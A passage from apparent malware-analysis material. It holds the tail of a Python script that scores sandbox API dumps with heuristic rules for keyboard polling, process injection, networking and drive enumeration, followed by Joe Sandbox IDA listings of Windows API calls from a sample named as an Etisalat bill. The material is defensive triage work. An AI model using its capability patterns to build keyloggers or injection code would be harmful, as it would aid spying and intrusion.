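VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN",
            0x5C: "VK_RWIN", 0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}

# Heuristic rules (editor's): (label, indicative API names, distinct names required).
RULES = [
    ("keyboard-state polling",
     {"GetAsyncKeyState", "GetKeyState", "GetKeyboardState", "SetKeyboardState"}, 2),
    ("process injection primitives",
     {"VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread",
      "NtQueueApcThread", "SetThreadContext", "NtMapViewOfSection"}, 2),
    ("winsock networking",
     {"WSAStartup", "socket", "connect", "send", "recv", "gethostbyname", "inet_addr"}, 2),
    ("ICMP echo (ping)", {"IcmpCreateFile", "IcmpSendEcho", "IcmpCloseHandle"}, 2),
    ("drive enumeration",
     {"GetDriveTypeW", "GetDriveTypeA", "GetLogicalDrives", "GetLogicalDriveStringsW"}, 1),
]


def parse_entries(text: str) -> List[Dict]:
    """Split the dump into function entries, one per 'APIs' heading."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = {"first_ref": None, "calls": [], "names": set()}
            entries.append(current)
            continue
        if current is None:
            continue
        if line in ("Memory Dump Source", "Strings"):  # end of this entry's API list
            current = None
            continue
        m = API_RE.search(line)
        if not m:
            continue
        call = {"name": m["name"], "module": m["module"], "args": m["args"] or "",
                "ref": m["ref"], "subcall": m["sub"]}
        current["calls"].append(call)
        current["names"].add(call["name"])
        if current["first_ref"] is None and call["subcall"] is None:
            current["first_ref"] = call["ref"]  # first direct call site names the function
    return entries


def tag_capabilities(entry: Dict) -> List[str]:
    """Labels whose rule is satisfied by the entry's API-name set, in RULES order."""
    return [label for label, apis, need in RULES if len(entry["names"] & apis) >= need]


def polled_keys(entry: Dict) -> List[str]:
    """Virtual keys the function polls; unresolved '?' arguments are skipped."""
    keys = set()
    for call in entry["calls"]:
        if call["name"] in ("GetAsyncKeyState", "GetKeyState"):
            first = call["args"].split(",")[0].strip()
            if re.fullmatch(r"[0-9A-Fa-f]+", first):
                code = int(first, 16)
                keys.add(VK_NAMES.get(code, f"VK_{code:02X}"))
    return sorted(keys)


def triage(text: str) -> List[Dict]:
    """Entries matching at least one rule, with their tags and polled keys."""
    rows = []
    for entry in parse_entries(text):
        tags = tag_capabilities(entry)
        if tags:
            rows.append({"func": entry["first_ref"], "tags": tags, "keys": polled_keys(entry)})
    return rows


if __name__ == "__main__":
    for row in triage(SAMPLE):
        print(row)
```

Feed the whole dump text to triage() to get one row per function that matched a rule; the "first_ref" address lets you jump to the function in the snapshot. Tags are leads, not verdicts: a keyboard-polling hit inside an AutoIt runtime function, or drive enumeration inside DriveGetDrive-style library code, is expected for this sample family and still has to be confirmed against the runtime's own code.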
                                      APIs
                                      • GetDlgItem.USER32(?,00000001), ref: 00BBC746
                                      • GetWindowRect.USER32(00000000,?), ref: 00BBC758
                                      • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00BBC7B6
                                      • GetDlgItem.USER32(?,00000002), ref: 00BBC7C1
                                      • GetWindowRect.USER32(00000000,?), ref: 00BBC7D3
                                      • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00BBC827
                                      • GetDlgItem.USER32(?,000003E9), ref: 00BBC835
                                      • GetWindowRect.USER32(00000000,?), ref: 00BBC846
                                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00BBC889
                                      • GetDlgItem.USER32(?,000003EA), ref: 00BBC897
                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00BBC8B4
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00BBC8C1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Window$ItemMoveRect$Invalidate
                                      • String ID:
                                      • API String ID: 3096461208-0
                                      • Opcode ID: f66d6e06ca6f7b0b52dfc6ad67b2f3dc7dccd593672515bfb7d76aa1a637d29f
                                      • Instruction ID: 98a4f9fac05463ecef05e8c10346d83262d8b7d6a9e5b858eb55b627a20eeb42
                                      • Opcode Fuzzy Hash: f66d6e06ca6f7b0b52dfc6ad67b2f3dc7dccd593672515bfb7d76aa1a637d29f
                                      • Instruction Fuzzy Hash: A5512071B00205AFDB18CF69DD99ABEBBBAEB88311F14816DF516D7290DBB09D00CB50
                                      APIs
                                        • Part of subcall function 00B61B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B62036,?,00000000,?,?,?,?,00B616CB,00000000,?), ref: 00B61B9A
                                      • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00B620D3
                                      • KillTimer.USER32(-00000001,?,?,?,?,00B616CB,00000000,?,?,00B61AE2,?,?), ref: 00B6216E
                                      • DestroyAcceleratorTable.USER32(00000000), ref: 00B9BEF6
                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00B616CB,00000000,?,?,00B61AE2,?,?), ref: 00B9BF27
                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00B616CB,00000000,?,?,00B61AE2,?,?), ref: 00B9BF3E
                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00B616CB,00000000,?,?,00B61AE2,?,?), ref: 00B9BF5A
                                      • DeleteObject.GDI32(00000000), ref: 00B9BF6C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                      • String ID:
                                      • API String ID: 641708696-0
                                      • Opcode ID: 80de65a7c62b2b6316690ebac68f74e46bf3ab378d9bcc695a0b84d7e31dd382
                                      • Instruction ID: e900d19e9e47800393535f93a7ddef594a20fa51213cbbbba6268300a1ce44b0
                                      • Opcode Fuzzy Hash: 80de65a7c62b2b6316690ebac68f74e46bf3ab378d9bcc695a0b84d7e31dd382
                                      • Instruction Fuzzy Hash: 1161AC31504A51DFEB359F18EE88B29B7F1FF40312F1084A9E5429B9A1CB79A891DF60
                                      APIs
                                        • Part of subcall function 00B625DB: GetWindowLongW.USER32(?,000000EB), ref: 00B625EC
                                      • GetSysColor.USER32(0000000F), ref: 00B621D3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ColorLongWindow
                                      • String ID:
                                      • API String ID: 259745315-0
                                      • Opcode ID: cb764f9a3e4b4fedc3400256e35cbab502cd9f8dd478f5af838b3490b3e195d7
                                      • Instruction ID: b4a26df9a787b80d96ffdfc0bb753cb1cd267f0bcc8c19033a07ee6e0edbbe74
                                      • Opcode Fuzzy Hash: cb764f9a3e4b4fedc3400256e35cbab502cd9f8dd478f5af838b3490b3e195d7
                                      • Instruction Fuzzy Hash: 2241A1310019949FEF215F28EC98BB93BA5EB06331F1482A5FD659F1E2CB358D42DB21
                                      APIs
                                      • CharLowerBuffW.USER32(?,?,00BEF910), ref: 00BCAB76
                                      • GetDriveTypeW.KERNEL32(00000061,00C1A620,00000061), ref: 00BCAC40
                                      • _wcscpy.LIBCMT ref: 00BCAC6A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: BuffCharDriveLowerType_wcscpy
                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                      • API String ID: 2820617543-1000479233
                                      • Opcode ID: af8918bddad9f1c0e8520d52d235fba2eb04577cfbd461884550d328f17ed052
                                      • Instruction ID: b9c5d7450455b40a39997e3c8229d3b1343a82dcf1224ac9bbc8cab9ee7bae63
                                      • Opcode Fuzzy Hash: af8918bddad9f1c0e8520d52d235fba2eb04577cfbd461884550d328f17ed052
                                      • Instruction Fuzzy Hash: AC51A0312183059BC710EF14C891EAAB7E6EF85318F1448ADF4969B2A2DB31ED49CB53
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: __i64tow__itow__swprintf
                                      • String ID: %.15g$0x%p$False$True
                                      • API String ID: 421087845-2263619337
                                      • Opcode ID: 9d824473767505d382829a4f30240a072299487c355464c6a62ac932c0658fe2
                                      • Instruction ID: 3695c18da267ac9e755a2618106e875edbd6cb44ddbe04e93fc18b0a47522398
                                      • Opcode Fuzzy Hash: 9d824473767505d382829a4f30240a072299487c355464c6a62ac932c0658fe2
                                      • Instruction Fuzzy Hash: 6B41D171604206AFDF24AB78DC82E7A73E8EB45320F2044FEE549D72A1EE75D941DB11
                                      APIs
                                      • _memset.LIBCMT ref: 00BE73D9
                                      • CreateMenu.USER32 ref: 00BE73F4
                                      • SetMenu.USER32(?,00000000), ref: 00BE7403
                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BE7490
                                      • IsMenu.USER32(?), ref: 00BE74A6
                                      • CreatePopupMenu.USER32 ref: 00BE74B0
                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00BE74DD
                                      • DrawMenuBar.USER32 ref: 00BE74E5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                      • String ID: 0$F
                                      • API String ID: 176399719-3044882817
                                      • Opcode ID: 58a87151bf31cdb2b2fcde57f206f9f73e39cbc695f9d2c0685681f1e0da4f25
                                      • Instruction ID: 072832ddde2a83900d475f1c2a01597249f19d91e6d940340d424b9e8464d052
                                      • Opcode Fuzzy Hash: 58a87151bf31cdb2b2fcde57f206f9f73e39cbc695f9d2c0685681f1e0da4f25
                                      • Instruction Fuzzy Hash: 55415875A00286EFDB20DF65D884BAABBF5FF59300F144068E955973A0DB31A910DFA0
                                      APIs
                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00BE77CD
                                      • CreateCompatibleDC.GDI32(00000000), ref: 00BE77D4
                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00BE77E7
                                      • SelectObject.GDI32(00000000,00000000), ref: 00BE77EF
                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00BE77FA
                                      • DeleteDC.GDI32(00000000), ref: 00BE7803
                                      • GetWindowLongW.USER32(?,000000EC), ref: 00BE780D
                                      • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00BE7821
                                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00BE782D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                      • String ID: static
                                      • API String ID: 2559357485-2160076837
                                      • Opcode ID: 79e5fea54c6463c5d4200033392296bb976c7fabbebcd8627e7ca96b32b48373
                                      • Instruction ID: 2681c1c5a20e66b6d8dca45fc151e7fb05ebb0ec67a7f99cfed3da3649ad5b1e
                                      • Opcode Fuzzy Hash: 79e5fea54c6463c5d4200033392296bb976c7fabbebcd8627e7ca96b32b48373
                                      • Instruction Fuzzy Hash: F3319E31105196BBDF119F76DC49FEB3BA9FF09321F110264FA15A61A0CB31D821DBA4
                                      APIs
                                      • _memset.LIBCMT ref: 00B8707B
                                        • Part of subcall function 00B88D68: __getptd_noexit.LIBCMT ref: 00B88D68
                                      • __gmtime64_s.LIBCMT ref: 00B87114
                                      • __gmtime64_s.LIBCMT ref: 00B8714A
                                      • __gmtime64_s.LIBCMT ref: 00B87167
                                      • __allrem.LIBCMT ref: 00B871BD
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B871D9
                                      • __allrem.LIBCMT ref: 00B871F0
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B8720E
                                      • __allrem.LIBCMT ref: 00B87225
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B87243
                                      • __invoke_watson.LIBCMT ref: 00B872B4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                      • String ID:
                                      • API String ID: 384356119-0
                                      • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                      • Instruction ID: 32d6c56768504e14e7ef0527d3e35f13d3244271a2ce3984ceb41c3c60744ca5
                                      • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                      • Instruction Fuzzy Hash: 4971D771A44716ABDB14FE79CC81B5AB3E8EF11728F2442BAF414E6691EB70D940C790
                                      APIs
                                      • _memset.LIBCMT ref: 00BC2A31
                                      • GetMenuItemInfoW.USER32(00C26890,000000FF,00000000,00000030), ref: 00BC2A92
                                      • SetMenuItemInfoW.USER32(00C26890,00000004,00000000,00000030), ref: 00BC2AC8
                                      • Sleep.KERNEL32(000001F4), ref: 00BC2ADA
                                      • GetMenuItemCount.USER32(?), ref: 00BC2B1E
                                      • GetMenuItemID.USER32(?,00000000), ref: 00BC2B3A
                                      • GetMenuItemID.USER32(?,-00000001), ref: 00BC2B64
                                      • GetMenuItemID.USER32(?,?), ref: 00BC2BA9
                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00BC2BEF
                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BC2C03
                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BC2C24
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                      • String ID:
                                      • API String ID: 4176008265-0
                                      • Opcode ID: 6247ed2124e5fc5cd0f16958b375a8966636a9bd44537ba614596d9ef90cc7bc
                                      • Instruction ID: a1b8ad7b58fd8ccf08576d8a8bb69dd74dcf64dc786d006f866a2454cffc2aed
                                      • Opcode Fuzzy Hash: 6247ed2124e5fc5cd0f16958b375a8966636a9bd44537ba614596d9ef90cc7bc
                                      • Instruction Fuzzy Hash: 3C6169B090028AAFDB21CF64D888FBFBBF8EB55304F1445ADE841A7251DB31AD45DB21
                                      APIs
                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00BE7214
                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00BE7217
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00BE723B
                                      • _memset.LIBCMT ref: 00BE724C
                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00BE725E
                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00BE72D6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: MessageSend$LongWindow_memset
                                      • String ID:
                                      • API String ID: 830647256-0
                                      • Opcode ID: 4079db4333ea933add37f433ab8921362751b513b7c677d12b0d0a8e62fd5a35
                                      • Instruction ID: 319ac63e92aa09d5fe7334a4f5d8eaee7a5634e3969714c6f02b3fe5fa1e30dc
                                      • Opcode Fuzzy Hash: 4079db4333ea933add37f433ab8921362751b513b7c677d12b0d0a8e62fd5a35
                                      • Instruction Fuzzy Hash: 74616D75940288AFDB20DFA4CC81EEE77F8EB09710F140199FA14E72A1DB70AD46DB64
                                      APIs
                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00BB7135
                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00BB718E
                                      • VariantInit.OLEAUT32(?), ref: 00BB71A0
                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00BB71C0
                                      • VariantCopy.OLEAUT32(?,?), ref: 00BB7213
                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00BB7227
                                      • VariantClear.OLEAUT32(?), ref: 00BB723C
                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00BB7249
                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00BB7252
                                      • VariantClear.OLEAUT32(?), ref: 00BB7264
                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00BB726F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                      • String ID:
                                      • API String ID: 2706829360-0
                                      • Opcode ID: e2ff6e242be648c089797dd8b24ef74454713141be529bd9a4674ddab432366e
                                      • Instruction ID: 3a32a9c7c698b2b28ad5b8bfc304628c1b06a8d1e9f0ff8276f25919037d9368
                                      • Opcode Fuzzy Hash: e2ff6e242be648c089797dd8b24ef74454713141be529bd9a4674ddab432366e
                                      • Instruction Fuzzy Hash: B8411D35904119AFCF009FA8D884DFEBBF9EF48354B0080A9E955AB361CB74A945CB90
                                      APIs
                                      • WSAStartup.WSOCK32(00000101,?), ref: 00BD5AA6
                                      • inet_addr.WSOCK32(?,?,?), ref: 00BD5AEB
                                      • gethostbyname.WSOCK32(?), ref: 00BD5AF7
                                      • IcmpCreateFile.IPHLPAPI ref: 00BD5B05
                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00BD5B75
                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00BD5B8B
                                      • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00BD5C00
                                      • WSACleanup.WSOCK32 ref: 00BD5C06
                                      Strings
                                      Similarity
                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                      • String ID: Ping
                                      • API String ID: 1028309954-2246546115
                                      • Opcode ID: 498603ff3c04d45099bc6cbb9b330c897a58176fc33e84075cd541d46a7fbbe9
                                      • Instruction ID: cdb605d429ab5fda7d34273e4ff32c619d0e8d224ca8b4aeb49c679e495bb55a
                                      • Opcode Fuzzy Hash: 498603ff3c04d45099bc6cbb9b330c897a58176fc33e84075cd541d46a7fbbe9
                                      • Instruction Fuzzy Hash: B9515D316047019FDB20AF24CC85B2AB7E4EF48710F1489ABF556DB2A1EB74ED40CB56
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 00BCB73B
                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00BCB7B1
                                      • GetLastError.KERNEL32 ref: 00BCB7BB
                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 00BCB828
                                      Strings
                                      Similarity
                                      • API ID: Error$Mode$DiskFreeLastSpace
                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                      • API String ID: 4194297153-14809454
                                      • Opcode ID: f214cba399459fb338ae7d2a3b77c22032de7763f7b72099bc2881795ca83244
                                      • Instruction ID: fb329e3ec71ec6089da2450b8e5f35d6f7fc51cc53d06162df78815ce3ce07ea
                                      • Opcode Fuzzy Hash: f214cba399459fb338ae7d2a3b77c22032de7763f7b72099bc2881795ca83244
                                      • Instruction Fuzzy Hash: BF316035A002099FDB10EF68D886FBE7BF8EF85710F1480AAE906DB291DB759D42C751
                                      APIs
                                        • Part of subcall function 00B67F41: _memmove.LIBCMT ref: 00B67F82
                                        • Part of subcall function 00BBB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00BBB0E7
                                      • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00BB94F6
                                      • GetDlgCtrlID.USER32 ref: 00BB9501
                                      • GetParent.USER32 ref: 00BB951D
                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00BB9520
                                      • GetDlgCtrlID.USER32(?), ref: 00BB9529
                                      • GetParent.USER32(?), ref: 00BB9545
                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00BB9548
                                      Strings
                                      Similarity
                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 1536045017-1403004172
                                      • Opcode ID: 81ee3eda93b909924ab318a65a13a200c35179fb6e49b9d29325945a874c9d28
                                      • Instruction ID: 9306f647c2ac000d55a6563dd723aacdf1187d74dd40dcb46574491f3a4399e7
                                      • Opcode Fuzzy Hash: 81ee3eda93b909924ab318a65a13a200c35179fb6e49b9d29325945a874c9d28
                                      • Instruction Fuzzy Hash: CD21F470900244BFCF04AB60CCC5EFEBBB5EF45300F1041A5B661972A2DFB99919DB20
                                      APIs
                                        • Part of subcall function 00B67F41: _memmove.LIBCMT ref: 00B67F82
                                        • Part of subcall function 00BBB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00BBB0E7
                                      • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00BB95DF
                                      • GetDlgCtrlID.USER32 ref: 00BB95EA
                                      • GetParent.USER32 ref: 00BB9606
                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00BB9609
                                      • GetDlgCtrlID.USER32(?), ref: 00BB9612
                                      • GetParent.USER32(?), ref: 00BB962E
                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00BB9631
                                      Strings
                                      Similarity
                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 1536045017-1403004172
